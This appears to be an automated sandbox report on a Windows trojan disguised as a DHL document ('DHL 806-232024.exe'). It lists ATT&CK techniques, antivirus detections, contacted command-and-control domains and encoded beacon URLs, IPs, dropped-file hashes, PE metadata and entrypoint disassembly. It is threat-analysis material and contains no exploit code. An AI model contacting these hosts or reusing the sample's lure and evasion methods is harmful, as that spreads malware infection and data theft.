Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL 806-232024.exe	29%	Virustotal		Browse
DHL 806-232024.exe	45%	ReversingLabs	Win32.Trojan.AutoitInject
DHL 806-232024.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.elettrosistemista.zip/fo8o/?SFst=D27DuB&UzG=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==	100%	Avira URL Cloud	malware
https://www.empowermedeco.com/fo8o/?UzG=mxnR	0%	Avira URL Cloud	safe
http://www.empowermedeco.com/fo8o/?UzG=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&SFst=D27DuB	0%	Avira URL Cloud	safe
http://www.empowermedeco.com	0%	Avira URL Cloud	safe
http://www.rssnewscast.com/fo8o/?UzG=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&SFst=D27DuB	100%	Avira URL Cloud	malware
http://www.magmadokum.com/fo8o/?SFst=D27DuB&UzG=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==	0%	Avira URL Cloud	safe
http://www.goldenjade-travel.com/fo8o/?SFst=D27DuB&UzG=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==	100%	Avira URL Cloud	malware
http://www.3xfootball.com/fo8o/?SFst=D27DuB&UzG=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==	0%	Avira URL Cloud	safe
http://www.techchains.info/fo8o/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
elettrosistemista.zip	195.110.124.133	true	false	high
empowermedeco.com	217.196.55.202	true	false	high
www.3xfootball.com	154.215.72.110	true	true	unknown
www.goldenjade-travel.com	116.50.37.244	true	false	high
www.rssnewscast.com	91.195.240.94	true	true	unknown
www.techchains.info	66.29.149.46	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.magmadokum.com	unknown	unknown	true	unknown
www.donnavariedades.com	unknown	unknown	false	high
www.660danm.top	unknown	unknown	true	unknown
www.joyesi.xyz	unknown	unknown	false	high
www.liangyuen528.com	unknown	unknown	true	unknown
www.kasegitai.tokyo	unknown	unknown	true	unknown
www.empowermedeco.com	unknown	unknown	false	high
www.k9vyp11no3.cfd	unknown	unknown	true	unknown
www.elettrosistemista.zip	unknown	unknown	false	high
www.antonio-vivaldi.mobi	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.elettrosistemista.zip/fo8o/?SFst=D27DuB&UzG=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==	true	Avira URL Cloud: malware	unknown
http://www.empowermedeco.com/fo8o/	false		high
http://www.elettrosistemista.zip/fo8o/	false		high
http://www.empowermedeco.com/fo8o/?UzG=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&SFst=D27DuB	true	Avira URL Cloud: safe	unknown
http://www.3xfootball.com/fo8o/?SFst=D27DuB&UzG=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==	true	Avira URL Cloud: safe	unknown
http://www.goldenjade-travel.com/fo8o/?SFst=D27DuB&UzG=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==	true	Avira URL Cloud: malware	unknown
http://www.magmadokum.com/fo8o/	false		high
http://www.rssnewscast.com/fo8o/?UzG=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&SFst=D27DuB	true	Avira URL Cloud: malware	unknown
http://www.rssnewscast.com/fo8o/	false		high
http://www.magmadokum.com/fo8o/?SFst=D27DuB&UzG=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==	true	Avira URL Cloud: safe	unknown
http://www.goldenjade-travel.com/fo8o/	false		high
http://www.techchains.info/fo8o/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.empowermedeco.com	yAEEhNGBaPExAdMu.exe, 00000006.00000002.4532024343.0000000004E6A000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	netbtugc.exe, 00000004.00000002.4530981261.000000000488E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4532489216.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.000000000356E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.empowermedeco.com/fo8o/?UzG=mxnR	netbtugc.exe, 00000004.00000002.4530981261.00000000051FA000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.0000000003EDA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.sedo.com/services/parking.php3	yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.000000000356E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pens/popular/?grid_type=list	netbtugc.exe, 00000004.00000002.4530981261.0000000004BB2000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.0000000003892000.00000004.00000001.00040000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pen/eYdmdXw.css	netbtugc.exe, 00000004.00000002.4530981261.0000000004BB2000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.0000000003892000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.rssnewscast.com	Germany	47846	SEDO-ASDE	true
154.215.72.110	www.3xfootball.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true
195.110.124.133	elettrosistemista.zip	Italy	39729	REGISTER-ASIT	false
116.50.37.244	www.goldenjade-travel.com	Taiwan; Republic of China (ROC)	18046	DONGFONG-TWDongFongTechnologyCoLtdTW	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
66.29.149.46	www.techchains.info	United States	19538	ADVANTAGECOMUS	true
217.196.55.202	empowermedeco.com	Norway	29300	AS-DIRECTCONNECTNO	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580265
Start date and time:	2024-12-24 08:22:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DHL 806-232024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@14/7
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 98% Number of executed functions: 46 Number of non-executed functions: 273
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target yAEEhNGBaPExAdMu.exe, PID 4416 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:23:55	API Interceptor	11527512x Sleep call for process: netbtugc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.94	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	236236236.elf	Get hash	malicious	Unknown	Browse	suboyule.736t.com/
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Certificate 11-21AIS.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Certificate 1045-20-11.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
154.215.72.110	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
	N2sgk6jMa2.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
	Document 151-512024.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	160.124.107.222
	nshkppc.elf	Get hash	malicious	Mirai	Browse	45.202.220.148
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	154.216.83.118
	arm7.nn-20241219-1505.elf	Get hash	malicious	Mirai, Okiru	Browse	154.193.11.9
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	193.108.46.191
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	154.86.45.150
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	156.250.45.228
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	http://93287.mobi	Get hash	malicious	Unknown	Browse	154.203.26.164
REGISTER-ASIT	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	SRT68.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	195.110.124.133
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	195.110.124.133
SEDO-ASDE	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	236236236.elf	Get hash	malicious	Unknown	Browse	91.195.240.94
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	Certificate 11-21AIS.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	Certificate 1045-20-11.exe	Get hash	malicious	FormBook	Browse	91.195.240.94

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut87C5.tmp

Download File

Process:	C:\Users\user\Desktop\DHL 806-232024.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.994890060838224
Encrypted:	true
SSDEEP:	6144:erdAJyg++76oixY/d4N3nmUTTPuYRdNAupuwKC9jV2ATAO4:m3c958nBju0puwuATAO4
MD5:	916D818164507B82ED06D9EAF7EFA826
SHA1:	2E673CADE434B61F3EA00B43BC925F274C417C6C
SHA-256:	4FB6D51F62CB32C04C55E697D7199AFCF3A82FAA0F75007449E4664B8B27715D
SHA-512:	DBD435E11EEB951BECDDFD7618619F3A86EE9BB9FB78F5F2B5238B16F3A11EBA46730E704749767297533488D53BDD35264E978E78B7AE47060F7F07071087A1
Malicious:	false
Reputation:	low
Preview:	u..d.DIWH..D...n.5N....MC...Z66DIWHAOLM1MYGRL5MY8R8NKH8SZ6.DIWF^.BM.D.f.My.xl:Q=k8J<=DW)i4)/!#9./<g 9[m0Vr\|..hU<>S.ID]lAOLM1MY>SE.p9_...,..3=.,..r!(.W..{2+.W.....,.j:9^.$..HAOLM1MY..L5.X9R.&..8SZ66DIW.AMMF0FYGBH5MY8R8NKH.FZ66TIWHaKLM1.YGBL5M[8R>NKH8SZ60DIWHAOLM.IYGPL5MY8R:N..8SJ66TIWHA_LM!MYGRL5]Y8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLcE(!3RL5.V<R8^KH8C^66TIWHAOLM1MYGRL5mY828NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5

C:\Users\user\AppData\Local\Temp\bleacher

Download File

Process:	C:\Users\user\Desktop\DHL 806-232024.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.994890060838224
Encrypted:	true
SSDEEP:	6144:erdAJyg++76oixY/d4N3nmUTTPuYRdNAupuwKC9jV2ATAO4:m3c958nBju0puwuATAO4
MD5:	916D818164507B82ED06D9EAF7EFA826
SHA1:	2E673CADE434B61F3EA00B43BC925F274C417C6C
SHA-256:	4FB6D51F62CB32C04C55E697D7199AFCF3A82FAA0F75007449E4664B8B27715D
SHA-512:	DBD435E11EEB951BECDDFD7618619F3A86EE9BB9FB78F5F2B5238B16F3A11EBA46730E704749767297533488D53BDD35264E978E78B7AE47060F7F07071087A1
Malicious:	false
Reputation:	low
Preview:	u..d.DIWH..D...n.5N....MC...Z66DIWHAOLM1MYGRL5MY8R8NKH8SZ6.DIWF^.BM.D.f.My.xl:Q=k8J<=DW)i4)/!#9./<g 9[m0Vr\|..hU<>S.ID]lAOLM1MY>SE.p9_...,..3=.,..r!(.W..{2+.W.....,.j:9^.$..HAOLM1MY..L5.X9R.&..8SZ66DIW.AMMF0FYGBH5MY8R8NKH.FZ66TIWHaKLM1.YGBL5M[8R>NKH8SZ60DIWHAOLM.IYGPL5MY8R:N..8SJ66TIWHA_LM!MYGRL5]Y8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLcE(!3RL5.V<R8^KH8C^66TIWHAOLM1MYGRL5mY828NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5MY8R8NKH8SZ66DIWHAOLM1MYGRL5

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.163199461679591
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL 806-232024.exe
File size:	1'208'832 bytes
MD5:	a32e770c62bab92fb9f5413a70a62836
SHA1:	46578409fab1fbe2a943bf685f672334643332ed
SHA256:	00157cae4f7d3b063ab95dcfd1ec233bb79a0fd54a18558fd104ca4599c38874
SHA512:	ac4f681f817c54651efd3460927ac785b7007ccd4d26d24c983dcf6fea475a336c4dbdcaa3e6298133132b06ed35fbec4817a187c6c583eae939e2f5e028fc23
SSDEEP:	24576:0AHnh+eWsN3skA4RV1Hom2KXMmHahTuMSynkiBU5:Dh+ZkldoPK8YahTuMvnkD
TLSH:	CD45BD0273D5C036FFABA2739B6AF60556BC7D254123852F13981DB9BC701B2262E763
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6769FAED [Tue Dec 24 00:06:05 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F471856654Dh
jmp 00007F4718559304h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F471855948Ah
cmp edi, eax
jc 00007F47185597EEh
bt dword ptr [004C41FCh], 01h
jnc 00007F4718559489h
rep movsb
jmp 00007F471855979Ch
cmp ecx, 00000080h
jc 00007F4718559654h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F4718559490h
bt dword ptr [004BF324h], 01h
jc 00007F4718559960h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F471855962Dh
test edi, 00000003h
jne 00007F471855963Eh
test esi, 00000003h
jne 00007F471855961Dh
bt edi, 02h
jnc 00007F471855948Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F4718559493h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F47185594E5h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x5ca58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x125000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
